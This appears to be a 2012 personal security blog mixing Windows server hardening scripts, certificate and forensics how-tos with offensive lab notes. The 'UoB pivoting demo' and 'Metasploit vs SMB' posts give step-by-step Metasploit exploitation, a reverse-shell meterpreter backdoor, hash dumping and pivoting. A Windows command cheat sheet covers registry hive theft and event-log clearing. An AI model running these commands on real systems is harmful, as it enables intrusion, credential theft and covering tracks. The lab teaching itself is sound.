Friday, 19 October 2012

Windows 2008 R2 server hardening v3


In the first blogpost you might have noticed .\4_Mine2.PS1's existence in Start.PS1 . Today we will look at its content and what we are doing with that file.

One of the most important issues with any windows system is keeping it up to date. Lets assume that you have a WSUS in your network... so you need to register this new box to that WSUS.  Following the scripts from another lovely bloger (Athif)  we put in out 0_Mine.PS1 file:

##**Enable Automatic Updates**
Write-Host ""
Write-Host "Configuring Automatic Updates through the WUPPS..." -ForegroundColor $Global:OnScreenMsgColor
net stop wuauserv
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v AccountDomainSid /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v PingID /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v SusClientId /f
net start wuauserv
wuauclt /resetauthorization /detectnow
reg import wupps-download-only.reg
Write-Host ""
Write-Host "Forcing Update through the WUPPS..." -ForegroundColor $Global:OnScreenMsgColor
net stop wuauserv
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v LastWaitTimeout /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v DetectionStartTime /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v NextDetectionTime /f
net start wuauserv
Write-Host "Update Configuration Completed..." -ForegroundColor $Global:OnScreenMsgColor
Write-Host ""


The wupps-download-only.reg file contains:
-----------------------------------------------------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\windows\WindowsUpdate]
"WUServer"="http://wupps.localdomain.local"
"WUStatusServer"="http://wupps.localdomain.local"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\windows\WindowsUpdate\AU]
"AutoInstallMinorUpdates"=dword:00000001
"NoAutoRebootWithLoggedOnUsers"=dword:00000001
"NoAutoUpdate"=dword:00000000
"AUOptions"=dword:00000003
"ScheduledInstallDay"=dword:00000000
"ScheduledInstallTime"=dword:00000012
"UseWUServer"=dword:00000001

-----------------------------------------------------------

Tao's script assumes you want to disable the default windows firewall most likely because you will install a firewall afterwards or an anti-virus with that functionality as well. Well lets say we are poor and we need that firewall to work!!

###**Firewall Configuration**
Write-Host "Configuring Firewall..." -ForegroundColor $Global:OnScreenMsgColor
Write-Host "Enabling RDP to this host..." -ForegroundColor $Global:OnScreenMsgColor
netsh advfirewall firewall set rule group="remote desktop" new enable=yes
Write-Host "Allowing RDP access to our admin VLAN and another IP..." -ForegroundColor $Global:OnScreenMsgColor
netsh advfirewall firewall set rule name="remote desktop (TCP-In)" new remoteip="192.168.1.100,192.168.5.0/24" enable=yes
Write-Host "Disabling DFS Management to this host..." -ForegroundColor $Global:OnScreenMsgColor
netsh advfirewall firewall set rule group="dfs management" new enable=no
Write-Host "Enabling SNMP access to this host..." -ForegroundColor $Global:OnScreenMsgColor
netsh advfirewall firewall set rule group="SNMP Service" new enable=yes
netsh advfirewall firewall set rule group="SNMP Trap" new enable=yes
Write-Host "Firewall Configuration Complete..." -ForegroundColor $Global:OnScreenMsgColor


Lastly that server manager pop-up and the notification taskbar auto-hide annoys me a bit so...

## Disable Server Manager Login screen
Write-Host "Disabling Server Manager Pop-up..." -ForegroundColor $Global:OnScreenMsgColor
reg add HKCU\Software\Microsoft\ServerManager /v DoNotOpenServerManagerAtLogon /t REG_DWORD /d 1 /f

Write-Host "Show all icons on notification bar..." -ForegroundColor $Global:OnScreenMsgColor
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer /v EnableAutoTray /t REG_DWORD /d 0 /f

and all is well with the world again :)

NOTE! As Tao mentions on the readme.doc "By default, Execution policy is “Restricted” which means powershell scripts are not allowed to run.". When you fix that by running

Set-ExecutionPolicy Unrestricted

keep in mind that when you are done and rebooted the system you have to set it back

Set-ExecutionPolicy Restricted


That's all for now, stay tuned..

Thursday, 18 October 2012

Microsoft Security Compliance Manager (Intro)

The product looked very interesting so decided to give it a go.. (its free no objections!!)

Prerequisites:

- Windows 2008 R2 SP1 box
- Microsoft .NET Framework 4
- Security Compliance Manager

Play time:

Go ahead and install the above in the order mentioned. When you reach the SCM point it will need to install SQL Server Xpress as well so go ahead and do that as well.

When the install finished the SCM will pop-up and all the basic Baselines will be imported (woohoo we are on our way!)

As you can see there is a considerable amount of work that has been done here.. you have templates for pretty much all the supported versions of windows (you must be crazy running anything outside of that matrix in your production environment!).

In addition to that each version has been categorized according to server functions (roles to use the MS language...) so its very easy to select the one you want and Duplicate (link on the column) so you can edit it further to your liking!

Moving from the customization subject which I will be coming back to later on, in the Start menu of the SCM you will see that LocalGPO is included. Go ahead and install it to the targeted systems so it can be used later on to deploy the custom Local Policy configs we will build.

When its done you can open your Powershell and go to Program Files (x86)\LocalGPO where you can find LocalGPO.wsf (simple run will give you a pop-up menu with the instructions).

The main reason behind LocalGPO is that its the only free way of distributing what we will do on SCM. The other ways all include System center which is not for everybody :P


That's all for now.. will come back to that later on.

Windows 2008 R2 server hardening v2

Continuing on the previous blogpost, Tao's script is not just things that don't work.
Because it is coded so nicely you can edit SecPolicy.inf to do more things, for example:

Under [System Access] you can add

PasswordHistorySize = 13
PasswordComplexity = 1
MaximumPasswordAge = 42
MinimumPasswordAge = 2
MinimumPasswordLength = 8
ResetLockoutCount = 2880
LockoutBadCount = 2
LockoutDuration = -1


which will enable you to define Account Policies better
(more details at technet)

and under [Registry Values] add

MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCAD=4,0
MACHINE\System\CurrentControlSet\Control\Session Manager\Memory Management\ClearPageFileAtShutdown=4,1
MACHINE\Software\Microsoft\ServerManager\Oobe\DoNotOpenInitialConfigurationTasksAtLogon=4,1

Which will force users to press CTRL+ALT+DEL to log on to the system
Clear the PageFile (swap) at shutdown (usually that can be an Audit requirement for some environments)
and finally get rid of the Initial Configuration screen

Because the script changes the system names and makes all those changes if we need to install SNMP/WMI we need to do it early so 0_Mine.PS1 comes in handy once again.

Add to 0_Mine.PS1 (Replacing the <> entries of course)

## Install SNMP
Write-Host "Installing and configuring SNMP..." -ForegroundColor $Global:OnScreenMsgColor
dism /online /enable-feature:SNMP
dism /online /enable-feature:WMISnmpProvider
reg add "HKLM\SYSTEM\CurrentControlSet\services\SNMP\Parameters\ValidCommunities" /v <RO_COMMUNITY_NAME> /t REG_DWORD /d 4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\services\SNMP\Parameters\PermittedManagers" /v 2 /t REG_SZ /d <IP_OF_UR_NAGIOS_BOX> /f
reg add "HKLM\SYSTEM\CurrentControlSet\services\SNMP\Parameters\RFC1156Agent" /v sysServices /t REG_DWORD /d 79 /f


That's all for now.. more to come :)

Windows 2008 R2 server hardening v1


Time to stop thinking about Linux hardening (at least for a while) and take a quick look at Windows 2008R2.. One would be crazy to have an infrastructure with just with windows OR linux so both need to be brought up to an acceptable level (out of the box never works I am not going to debate that).

The following I found to be quite useful resourses:

Link 1
Link 2 (pdf)
Link 3 (MS technet)
Link 4 (blog)
Link 5 (blog)

The last link (Tao Yang) is a brilliant collection of Powershell scripts which many wonderfull things.

Unfortunately nothing works out of the box so...

You can create a 0_Mine.PS1 which you can include in Start.PS1 (around line 230) before Tao starts his own scripts.

Add this to 0_Mine.PS1:

Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\iphlpsvc -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\Dhcp -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\Spooler -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\RemoteRegistry -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\WinRM -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\UxSms -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\LanmanServer -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\LanmanWorkstation -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\lmhosts -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\CertPropSvc -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\SCPolicySvc -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\ScardSvr -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\RasMan -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\Tapisrv -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\RasAuto -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\RemoteAccess -Name "Start" -Value 4


Another thing that did not work was the IPv6 disabling bit... so Bhargav Shukla (ex-Microsoft dude) to the rescue..

technet bshukla

You can pick that up and add it to the same area in Start.PS1 but make sure it looks like this:

.\0_Mine.PS1
.\1_OSConfig.PS1
.\2_network.PS1
.\Disable-IPv6Components.ps1 -All
.\3_security.PS1
.\4_Mine2.PS1



more to come.. stay tunned (I am far from saying done on this one!)
 

Thursday, 6 September 2012

NetIQ Access Manager Admin Console custom certificates

When you have any type of web service offered via https the first thing that should cross your mind should be "did I install verified certificates for this?". I will not go into the many reasons why you should do this... just do it!

NetIQ are continuing the work after Novell on Access Manager so even if they have awesome documentation for 99% of the product... they missed that (thank the gods they had some useful hints for this though in the support for iManager [link in the end])

So here it is:

  • cd /etc/opt/novell/tomcat7/ ; mkdir certs ; cd certs
  • /opt/novell/java/bin/keytool -genkey -keysize 2048 -alias <hostname.domain.com> -keyalg RSA -keystore <hostname>.keystore
  • /opt/novell/java/bin/keytool -certreq -keyalg RSA -alias <hostname.domain.com> -file certreq.csr -keystore <hostname>.keystore
  • Send the csr to your Certification Authority (in this case COMODO)
  • Make sure that everything is where it should
    /opt/novell/java/bin/keytool -list -keystore /etc/opt/novell/tomcat7/certs/<hostname>.keystore -v
  • Get whatever.zip from comodo
  • cd /etc/opt/novell/tomcat7/certs/ ; unzip /root/whatever.zip
  • chown novlwww.novlwww *
  • /opt/novell/java/bin/keytool -import -alias root -keystore <hostname>.keystore -trustcacerts -file TERENASSLCA.crt
  • /opt/novell/java/bin/keytool -import -alias caroot -keystore <hostname>.keystore -trustcacerts -file UTNAddTrustServer_CA.crt
  • /opt/novell/java/bin/keytool -import -alias <hostname.domain.com> -keystore <hostname>.keystore -trustcacerts -file whatever.crt
  • /opt/novell/java/bin/keytool -import -alias tomcat -keystore <hostname>.keystore -trustcacerts -file whatever.crt
  • Double check that all certs are in the keystore
    /opt/novell/java/bin/keytool -list -keystore /etc/opt/novell/tomcat7/certs/<hostname>.keystore -v 
 You would think at this point that following normal Tomcat process would be good enough and we could just add in our server.xml at the 8443 connector an option like keystoreFile="/etc/opt/novell/tomcat7/certs/<hostname>.keystore" and that would be it... but NO. I tried it and it did NOT work for some reason... so here is the fix

  • cp -p /var/opt/novell/novlwww/.keystore /var/opt/novell/novlwww/.keystore-default
  • mv /etc/opt/novell/tomcat7/certs/<hostname>.keystore /var/opt/novell/novlwww/.keystore
  • service novell-ac restart
  • And done!
more here: Replacing default certificates in iManager 2.7 (non-OES install)


Wednesday, 5 September 2012

CISSP Training

CISSP Training was completed a bit over a week ago and revision is continuing still...

The course was delivered by Geraint Williams of IT Governance through the University's  KnowledgeHub program (enough with the ads though!!).

Awesome course to say the least, plus GeraintW was kind enough to add some very nice posts to his blog detailing some of the material covered in the course (brilliant for revision)

And here we go:

Domain 1 - Access Control
Domain 2 - Telecommunications and Network Security
Domain 3 - Information Governance & Risk Management
Domain 4 - Software Development Security
Domain 5 - Cryptography
Domain 6 - System Architecture and Design
Domain 7 - Operation Security
Domain 8 - Business Continuity & Disaster Recovery
Domain 9 - Legal, Regulations & Investigations

One more to come I will add them when they are done I guess :)

Many thanks need to go to GeraintW for providing us with a great course :)

Cheers!


F5 BigIP - NetIQ Access Manager monitors

Vacations have ended and its back to work...

Lets create some monitors for the master proxies of the Access Manager we have setup so we don't leave it to the default icmp_gateway health check.

Assumptions:


  • You have configured your Admin consoles, Identity servers, Access Gateways 
  • You have added one http and one https reverse proxy in the Gateways (so the parent proxies exist at least..)
  • You have created two vIPs on the F5s pointing to each Pool of the IPs of each proxy

Monitors:

  • Go to your F5 Admin GUI login and go to Local Traffic -> Monitors -> Create
  • Name: Access_Gateway_HTTPS_Monitor 
  • Select type: HTTPS
  • Leave defaults for all fields except 
  • Send String should be:   GET /nesp/app/heartbeat HTTP/1.1\r\nHost: <hostname-of-your-https-proxy-parent>\r\nConnection: Keepalive\r\n\r\n
  • Receive String should be:  Success
  • Click Finished
  • Go to the http pool and add it as a Monitor
  • Follow same steps for http only changing the type and the hostname of the parent proxy


Done :)

Thursday, 14 June 2012

Quake3 Arena Fedora 16

Yes its that time of the year that I get bored and all I want to do is play some quake3 :)

So yeah... quick post and back to gaming :)

  • Download both packages from:
    http://ioquake3.org/
  • chmod +x both files
  • run them
  • ln -s /whereever_u_keep_ur_pak0.pk3_file/pak0.pk3 /usr/local/games/ioquake3/baseq3/
  • and run ioquake3
  • hit ~ and enter
  • /r_mode -1
  • /r_customwidth 1680
  • /r_customheight 1050
  • /vid_restart
  • and when you get in the game...
  • /cg_fov 120

Go Yuriko!!

Monday, 21 May 2012

Restore files / Image acquisition 101

First of all lets acquire the image of the disk in question so we can recover the files.

Boot your backtrack disk (usb or disk does not matter that much) and load up the Forensics mode (no disk no swap)

Check out to see what disks/partitions we got

dmesg | grep sd

Get the images from both partitions and transfer them to the workstation where you will be doing the work.

dcfldd if=/dev/sda1 | ssh username@hostname "dd of=/path/on/the/remote/machine/image1.img" 

dcfldd if=/dev/sda2 | ssh username@hostname "dd of=/path/on/the/remote/machine/image2.img"

Now lets make the images to VMware disks

qemu-img convert -f raw /storage/data/recover/sda1.img -O vmdk /storage/data/recover/vmware-sda1.vmdk

or

wget "http://downloads.sourceforge.net/project/raw2vmdk/raw2vmdk-0.1.3.1-jar.tar.gz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fraw2vmdk%2F&ts=1337595038&use_mirror=kent"

tar -zxvf raw2vmdk-0.1.3.1-jar.tar.gz
rm -rf raw2vmdk-0.1.3.1-jar.tar.gz
cd  raw2vmdk-0.1.3.1-jar

java -jar raw2vmdk.jar /storage/data/recover/sda2.img /storage/data/recover/vmware-sda2.vmdk


Now they can be loaded into VMware and files can be restored using:

Diskdigger (needs licence)
Recuva (free)
FreeRecovereer (free)
File Scavanger (needs licence)


Stay tuned :)

Tuesday, 15 May 2012

UoB pivoting demo

These are the notes from a quick demo I did at the University of Bedfordshire. Enjoy..

  • Open Armitage
  • Scan (nmap) 172.16.128.x and find web server
db_nmap -sT -Pn -T5 -O --open 172.16.128.1/24 
  • Find attacks
  • Visit site (http://172.16.128.3) and attack
  • Exploit using CVE-2011-4453  (pmwiki) GUI fail -> use console
use exploit/multi/http/pmwiki_pagelist
set rhost 172.16.128.3
exploit -j
sessions -v
  • Check out the system (sysinfo,ps,getuid) no hashdump/winenum/route >> php-meterpreter not full functionality so...
  • Create a backdoor
msfpayload windows/x64/meterpreter/reverse_tcp LHOST=172.16.128.10 LPORT=8443 EXITFUNC=thread X > /root/Tools/runme.exe
  • cat /root/Tools/meh.php
<?php
system("runme.exe");
?>
  • Upload both meh.php and runme.exe
lcd /root/Tools
upload meh.php
upload runme.exe
  • Start a listener
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set exitfunc thread
set lhost 172.16.128.10
set lport 8443
exploit -j
  • Open a Terminal and
wget http://172.16.128.3/meh.php
  • Second session now has full system privs
  • Get hashdump
  • Crack with ophcrack
  • Check out routes with ipconfig/route (time to pivot!) 
route add 10.1.87.1 255.255.255.0 2
  • Scan subnet using arpscan
run arp_scanner -r 10.1.87.1/24
  • Scan hosts using metasploit tcp scanner
  • Locate windows server
  • Locate linux server
  • Compromise windows box
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/bind_tcp
set RHOST 10.1.87.4
exploit -j
  • Take hash and crack with ophcrack
  • Compromise linux box
  • Create a forwarding tunnel to check out the web server
portfwd add -l 8080 -p 80 -r 10.1.87.5
  • Test php-cgi exploit on it on local browser (http://localhost:8080/configuration.php?-s)
use auxiliary/scanner/ssh/ssh_login
set USERNAME root
set PASSWORD password
set RHOSTS 10.1.87.5
run -j

Thats all for now..
Stay tuned :)

Friday, 4 May 2012

Volatility taster


On our Backtrack system lets setup a quick samba to accept the memory dump on
  • apt-get install samba
  • vi /etc/samba/smb.conf (comment all the shares and add just the following)
[btshare] 
   comment = btshare 
   path = /btshare 
   read only = no 
   guest ok = yes 
   browsable = yes
save and exit
  • mkdir /btshare
  • chmod 777 /btshare
  • service smbd restart

On our target system open the USB stick that has DEFT in it.
Run deft extra an decide where your audit log will go
Go to Acquire and launch the trusted shell in order to run win32dd or win64dd
  • win64dd /r /f \\192.168.1.7\btshare\win7memory.img
  • cd /root/Tools/
  • svn checkout http://volatility.googlecode.com/svn/trunk Volatility
  • cd Volatility
  • chmod +x vol.py
  • ./vol.py -f /btshare/win7memory.img imageinfo
  • ./vol.py -f /btshare/win7memory.img --profile Win7SP1x64 pslist
  • ./vol.py -f /btshare/win7memory.img --profile Win7SP1x64 connections
  • ./vol.py -f /btshare/win7memory.img --profile Win7SP1x64 connscan
  • ./vol.py -f /btshare/win7memory.img --profile Win7SP1x64 hivescan
  • ./vol.py -f /btshare/win7memory.img --profile Win7SP1x64 hivelist 0x031da010

More to come :)

Saturday, 28 April 2012

pyrit on Fedora 16

So yeah... finally the new workstation arrived so let install pyrit and see what that GPU can do :) So lets go..



yum install make gcc-c++ freeglut-devel libXi-devel libXmu-devel

ln -s /usr/lib64/nvidia/libcuda.so /usr/lib64/libcuda.so && ln -s /usr/lib64/nvidia/libcuda.so.1 /usr/lib64/libcuda.so.1

export LD_LIBRARY_PATH=/usr/local/cuda/lib:/usr/local/cuda/lib64
echo $LD_LIBRARY_PATH

cd /etc/ld.so.conf.d/

echo "/usr/local/cuda/lib64" >> cuda.conf
echo "/usr/local/cuda/lib" >> cuda.conf

ldconfig

yum --enablerepo=updates-testing install pyrit

wget http://developer.download.nvidia.com/compute/cuda/4_2/rel/toolkit/cudatoolkit_4.2.9_linux_64_fedora14.run

chmod +x cudatoolkit_4.2.9_linux_64_fedora14.run

./cudatoolkit_4.2.9_linux_64_fedora14.run

cd /usr/local/src/

wget http://pyrit.googlecode.com/files/cpyrit-cuda-0.4.0.tar.gz

tar -zxvf cpyrit-cuda-0.4.0.tar.gz

rm -rf cpyrit-cuda-0.4.0.tar.gz

cd cpyrit-cuda-0.4.0/

python setup.py build

python setup.py install

pyrit list_cores
#1:  'CUDA-Device #1 'GeForce GTX 550 Ti''
#2:  'CPU-Core (SSE2)'
#3:  'CPU-Core (SSE2)'
#4:  'CPU-Core (SSE2)'
#5:  'CPU-Core (SSE2)'
#6:  'CPU-Core (SSE2)'
#7:  'CPU-Core (SSE2)'
#8:  'CPU-Core (SSE2)'

pyrit benchmark
Computed 14121.52 PMKs/s total.
#1: 'CUDA-Device #1 'GeForce GTX 550 Ti'': 12473.9 PMKs/s (RTT 2.8)
#2: 'CPU-Core (SSE2)': 424.3 PMKs/s (RTT 3.0)
#3: 'CPU-Core (SSE2)': 428.5 PMKs/s (RTT 3.0)
#4: 'CPU-Core (SSE2)': 424.6 PMKs/s (RTT 3.1)
#5: 'CPU-Core (SSE2)': 428.2 PMKs/s (RTT 3.2)
#6: 'CPU-Core (SSE2)': 417.9 PMKs/s (RTT 3.0)
#7: 'CPU-Core (SSE2)': 409.9 PMKs/s (RTT 3.0)
#8: 'CPU-Core (SSE2)': 410.8 PMKs/s (RTT 3.1)


Not bad at all!! :) Stay tuned for more

Friday, 30 March 2012

Windows CMD line cheat sheet (hunter-gatherer)


Another quick note this time for Windows CMDline, this is pretty much a shortlist of things I found interesting from Rob Fuller's google doc..



Generic Commands
whoami /all Lists current user, sid, groups current user is a member of and their sids as well as current privilege level.
systeminfo Outputs a large amount of data about the sytem, including hostname, domain, logon server, time zone, network interface config, and hotfixes installed
qwinsta Displaying information about RDP sessions. /CONNECT can be added
qprocess * Much like tasklist, but a bit easier to read. It has username, login mqappsrvethod, session id, pid, and binary name.
schtasks /query /fo csv /v > %TEMP% Outputs the list of services in verbose csv format. Good for throwing in temp and pulling down for a more closer look.
net start
OR
sc query
Lists services
sc getkeyname “XXXXX” You can use the name you got from ‘net start’ to get the ‘key name’ of the service you want more information on.
sc queryex “XXXXX” Using the keyname you achieved from ‘getkeyname’, you can query the status, pid and other information about the service.
tasklist /m  or tasklist /m blah.dll Lists all of the ‘modules’ (binary (exe, dll, com or any other PE based code that was executed) for each process, or if a module is specified then tasklist will only list the processes with that specific module running. Great for finding processes running crypto or other specific function dlls
taskkill [/f] /pid <pid>
taskkill [/f] /im <image_name>
Kill processes by name or pid (with force option)
fsutil fsinfo drives Must be an administrator to run this, but it lists the current drives on the system.
reg query HKLM /s /d /f "C:\* *.exe" | find /I "C:\" | find /V """" Locates insecurely registered executables within the system registry on Windows 7.
netstat -nabo netstat with process exe
netstat -na | findstr :445 just like grep :)
net user %USERNAME% /domain Pulls information on the current user, if they are a domain user. If you are a local user then you just drop the /domain. Important things to note are login times, last time changed password, logon scripts, and group membership
net user /domain Lists all of the domain users
net localgroup administrators Prints the members of the Administrators local group
net localgroup administrators /domain as this was supposed to use localgroup & domain, this actually another way of getting *current* domain admins
gpresult /z Extremely verbose output of GPO (Group policy) settings as applied to the current system and user
sc query display services /state type and other info
rundll32.exe user32.dll, LockWorkStation lock the screen (that WOULD piss people off!!)
wscript.exe <script js/vbs> run things...
cscript.exe <script js/vbs/c#> run more things..


Remote access
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f Enable remote desktop.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f Enable remote assistance


Reg Commands
reg save HKLM\Security security.hive   Save security hive to a file
reg save HKLM\System system.hive Save system hive to a file
reg save HKLM\SAM sam.hive Save sam to a file
reg add [\\TargetIPaddr\] [RegDomain][ \Key ] What it says on the tin
reg export [RegDomain]\[Key] [FileName] What it says on the tin
reg import [FileName ] What it says on the tin
reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] ( ) You can to add /s for recurse all values


Deleting Logs
wevtutil el List logs
wevtutil cl <LogName> Clear specific log
del %WINDIR%\*.log /a /s /q /f What it says on the tin


Non interactive pkg management
wmic product get name /value Get the name
wmic product where name="XXX" call uninstall /nointeractive Uninstall
pkgmgr usefull  /iu :”Package”
pkgmgr usefull  /iu :”TelnetServer” Install Telnet Service
pkgmgr /iu:”TelnetClient” Install the client



Stay tuned for more :)

Friday, 23 March 2012

Metasploit enumerating

Continuing from here...

You have your hosts scanned and added in your msf database so... lets go banner grabbing :)

  • msfconsole

  • use auxiliary/scanner/smb/smb_version 
  • services -p 445 -R 
  • run 

  • use auxiliary/scanner/http/http_version 
  • services -p 80 -R 
  • run 

  • use auxiliary/scanner/postgres/postgres_version 
  • services -p 5432 -R 
  • run

  • use auxiliary/scanner/mysql/mysql_version 
  • services -p 3306 -R 
  • run


If you re-run hosts and services you will see a more up to date listing of the services the scripts picked up :)

to be continued..

Wednesday, 21 March 2012

Metasploit vs SMB


Continuing from the previous post (scanning)

Our hosts output is not very rewarding as is... so since we are looking for windows smb vulenrabilites lets look at getting some version info

  • msfconsole> use auxiliary/scanner/smb/smb_version
  • services -p 445 -R
  • show options (increase the number of threads according to your flavor and make sure that your services -p 445 -R worked fine)
  • exploit
[*] 10.1.87.129:445 is running Windows 2003 R2 Service Pack 2 (language: Unknown) (name:WIN2K3) (domain:WORKGROUP) 
[*] Scanned 1 of 3 hosts (033% complete) 
[*] 10.1.87.133:445 is running Windows Server 2008 R2 Enterprise (Build 7600) (language: Unknown) (name:WIN2K8R2-ENT) (domain:WORKGROUP) 
[*] Scanned 2 of 3 hosts (066% complete) 
[*] 10.1.87.137:445 is running Windows XP Service Pack 3 (language: English) (name:CISLAB) (domain:WORKGROUP) 
[*] Scanned 3 of 3 hosts (100% complete) 
[*] Auxiliary module execution completed
  • hosts (notice that the new info found its way in the database and appears now on the main list)
  • services -p 445 (same here :D )
  • back (we had our fill of that module lets try something else)
  • search type:exploit port:445 
  • info exploit/windows/smb/ms08_067_netapi
  • use exploit/windows/smb/ms08_067_netapi
  • services -p 445 (pick one.. this module does not have an RHOSTS option but an RHOST option)
  • set rhost 10.1.87.129
  • exploit
[*] Started reverse handler on 10.1.87.128:4444  
[*] Automatically detecting the target... 
[*] Fingerprint: Windows 2003 R2 - Service Pack 2 - lang:Unknown 
[*] We could not detect the language pack, defaulting to English 
[*] Selected Target: Windows 2003 SP2 English (NX) 
[*] Attempting to trigger the vulnerability... 
[*] Sending stage (752128 bytes) to 10.1.87.129 
[*] Meterpreter session 1 opened (10.1.87.128:4444 -> 10.1.87.129:1055) at 2012-03-19 21:21:30 +0000
meterpreter > (Kaboom!) 
  • run winenum ( be patient... it will create a directory.. in this case /root/.msf4/logs/scripts/winenum/WIN2K3_20120319.2341 and will put all the information you want from that host there)
  • background (it will leave the session open and send you back to the msfconsole prompt)
  • cd /root/.msf4/logs/scripts/winenum/WIN2K3_20120319.2341
  • ls
  • cat hashdump.txt (you could just run hashdump in the meterpreter session I know but we take the long way this time...)
  • take the Admin hash and use the rainbow tables provided online by http://www.onlinehashcrack.com 
  • sessions (will show you your active sessions) 
  • sessions -i 1 (will take you back to the active session on the 2003 box)


Stay tuned for more :P

Monday, 19 March 2012

Metasploit scanning

Some quick notes :)

Importing from nmap (ol skul)
  • db_status (make sure that your postgres is connected)
  • hosts (it should be empty)
  • nmap -sT -P0 -O --open -oX 10.1.87-range.xml 10.1.87.1/24 (on the command line)
  • db_import /root/10.1.87-range.xml (or you can cd and ls to find the exact location and filename from your msf> console)
  • hosts (you should be able to see the hosts nmap has found)
  • services (it will show you the open ports on the found systems)
  • services -s ssh (break it down using the service name)
  • services -p 22 (break it down using the port number)
  • services -p 22 -R (When attacking multiple hosts or enumerating try this to load all the matching hosts to your RHOST option automagically)
  • hosts -d (to clear all imported hosts)
Using nmap through msfconsole (for the itchy junkie)
  • db_nmap -sT -P0 -O --open 10.1.87.1/24 
  • hosts (the itch stops)
The extra-quick way (usually == sloppy)
  • search portscan
  • use auxiliary/scanner/portscan/tcp 
  • set rhosts 10.1.87.1/24 
  • set threads 100 
  • set ports 445 80 21-25 110 139 143 8080 9090 8443 443 135 3389
  • run


to be continued...

Tuesday, 13 March 2012

Debian - rpm cheat sheet

Working with BackTrack has its advantages but having spent most of my adult life with Slackware and RedHat based distros... I have found the following useful in many occasions

-->
RedHat
Debian
Description
rpm -ivh {rpm-file}
dpkg -i {deb-file}
Install the package
rpm -Uvh {rpm-file}
Use apt-get :P
Upgrade package
rpm -ev {package}
dpkg -r {package}
Erase/remove/ an installed package
rpm -ql {package}
dpkg -L {package}
Display list all package files
rpm -qa
dpkg -l {package}
Display list all installed packages
rpm -qi {package}
dpkg -p {package}
Display installed information along with package version and short description
rpm -qf {/path/to/file}
dpkg -S {/path/to/file}
Find out what package a file belongs to.


Thanks for playing :)

Sunday, 11 March 2012

Backtrack 5 and ASUS TFT101

Since the tablet got rooted there is all kinds of beautiful things we can do with it :) One of those being BackTrack 5. Very easy to install (thanks to secmaniac)

Steps:

Download BT5 for ARM on your PC from here

Unzip the 7z file and copy its contents in your memory card

On the tablet download and install ASTRO file manager (it has the unzip function you will need later)

While you're at it download and install PocketCloud (you will need it to VNC into the BT5 box later)

If you dont have one already get a Terminal emulator as well (yes you need that too)

Go to the ASTRO file manager and find the directory you have bt5 on the memory card (/Removable/MicroSD/bt5).

Copy it to your Internal memory under /sdcard/ (we need to unzip the image and the file is more than the 4GB your FAT32 memory card can support)

Go into the bt5 directory you just copied over and unzip the bt5.img.gz (Extract To This Directory) file (it will take a while go make yourself a cup of tea or something.. [even if it does not show the progress it is still unzipping.. so wait until the file reaches 5GB])

Close ASTRO file manager and open up you Terminal Emulator and run:
su
cd /sdcard/bt5
cp busybox ../
sh installbusybox.sh
( If you are using the Terminal Emulator Vol-UP+t is tab completion in case you are wondering..)
sh bootbt 
Now your should have a # on the bt5 system its time to change your vnc password.
vncpasswd
Go ahead and  start the VNC session now (you can end it with stopvnc)
startvnc
Now you can VNC from your box  or from the tablet itself to port 5901 with the password you set and play :)


NOTE: DO NOT run apt-get update/upgrade/dist-upgrade packages are not working 100% yet and you will loose stuff (stuff like gnome-terminal and firefox!)

Thanks for playing :)

Saturday, 10 March 2012

Backtrack notes

Some quick notes on Backtrack 5 RC2. Just some things that need to be done on a fresh install..



Metasploit:
cd /opt/framework/lib/ (or /opt/metasploit/common/lib)
mv libcrypto.so.0.9.8 libcrypto.so.0.9.8.bak
mv libssl.so.0.9.8 libssl.so.0.9.8.bak
ln -s /usr/lib/libcrypto.so.0.9.8
ln -s /usr/lib/libssl.so.0.9.8 
msfupdate 

Autologin:
apt-get install rungetty
vi /etc/init/tty1.conf (comment last line and add)
exec /sbin/rungetty tty1 --autologin root
echo "startx" >> /root/.bash_profile

Icon fix:
gconftool -s /apps/metacity/general/button_layout -t string :minimize,maximize,close

Office:
apt-get install python-software-properties
add-apt-repository ppa:libreoffice/ppa
